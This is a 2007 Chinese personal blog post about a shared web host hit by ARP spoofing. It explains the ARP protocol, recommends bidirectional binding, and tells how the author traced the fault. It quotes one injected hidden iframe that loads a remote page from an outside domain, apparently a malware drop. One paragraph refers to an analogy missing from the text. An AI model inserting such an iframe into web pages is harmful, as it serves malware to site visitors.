网站所在虚拟主机遭遇arp攻击

         首先,自己对ARP攻击和ARP欺骗也不了解,但是今天确实碰到了,群里不少朋友给讲述了ARP木马和ARP欺骗,ARP攻击的区别.对ARP有了大致的了解.

         什么是ARP?

地址解析协议（Address Resolution Protocol，ARP）是在仅知道主机的IP地址时确定其物理地址的一种协议。因IPv4和以太网的广泛应用，其主要用作将IP地址翻译为以太网的MAC地址，但其也能在ATM和FDDI IP网络中使用。从IP地址到物理地址的映射有两种方式：表格方式和非表格方式。ARP具体说来就是将网络层（IP层，也就是相当于OSI的第三层）地址解析为数据连接层（MAC层，也就是相当于OSI的第二层）的MAC地址。 假设:
计算机A的IP为192.168.1.1,MAC地址为00-11-22-33-44-01;
计算机B的IP为192.168.1.2,MAC地址为00-11-22-33-44-02;
ARP工作原理如下:
在TCP/IP协议中,A给B发送IP包,在包头中需要填写B的IP为目标地址,但这个IP包在以太网上传输的时候,还需要进行一次以太包的封装,在这个以太包中,目标地址就是B的MAC地址.
计算机A是如何得知B的MAC地址的呢？解决问题的关键就在于ARP协议。
在A不知道B的MAC地址的情况下,A就广播一个ARP请求包,请求包中填有B的IP(192.168.1.2),以太网中的所有计算机都会接收这个请求,而正常的情况下只有B会给出ARP应答包,包中就填充上了B的MAC地址,并回复给A。
A得到ARP应答后,将B的MAC地址放入本机缓存,便于下次使用。
本机MAC缓存是有生存期的,生存期结束后,将再次重复上面的过程。

           怎么防止被实施ARP攻击或者ARP欺骗?

防止ARP攻击或者ARP欺骗唯一的解决方案----双向绑定

以上以思想不坚定的快递员情况，说明了常见的ARP攻击防制方法。ARP攻击利用的就是ARP协议的意志不坚，只有以培训的方式让ARP协议的意志坚定，明白正确的工作方法，才能从根本解决问题。只是依赖频繁的提醒快递员正确的作事方法，但是没有能从快递员意志不坚的特点着手，就好像只管不教，最终大家都很累，但是效果仍有限。

经我公司技术团队仔细研究，建议：面对这种新兴攻击，取巧用省事的方式准备，最后的结果可能是费事又不管用，必须重新来过。ARP双向绑定虽然对管理带来一定的工作量，但是其效果确是从根本上解决了问题。
             

               确定网站的虚拟主机的小空间是否中了ARP木马的方法

        我的网站当时的状态是,网页打开非常慢,然后查看源代码发现,最上面多了一行代码

<iframe src="http://www.666888ip.cn/mm/hei.htm" width="100" height="0"></iframe>

这个状态不是中了ARP木马就是空间受到了ARP攻击或者ARP欺骗.

        下面排除法寻找问题根源,把空间里的网页下载到本地,查看并没有 最上面一行,说明网页本身并没有问题,杀毒也没发现问题,自己单独网站的问题排除了,就是虚拟主机或者机房的事情了,用工具查看了虚拟主机IP上的其他网站,也都是这个问题,说明空间有问题,

我又查看了不是这个IP上的几个网站,发现也出现如此现象,可以判断整个机房受到了ARP攻击或者ARP欺骗.

         幸亏,傍晚的时候,ARP的问题解决了,不然搜索引擎来的时候.网站慢的要死的反映速度肯定会给网站带来不良的影响.当你的网站有一天速度出奇的慢的时候,你也可以查看一下是否受到了ARP攻击.

为什么google adsense广告点击率下降?  (2007-12-29 0:50:29)

网站成功被百度收录  (2007-12-27 3:27:3)

网站建设的详细流程  (2007-12-25 2:8:15)

搜索引擎收录情况观察-连续6天的情况  (2007-12-23 13:30:27)

网站等待被搜索引擎收录  (2007-12-19 2:28:1)

百度耍大牌 google,雅虎,LIVE 老实本分  (2007-12-17 11:0:32)

小小的等待！百度，google，yahoo速来领奖  (2007-12-15 21:18:33)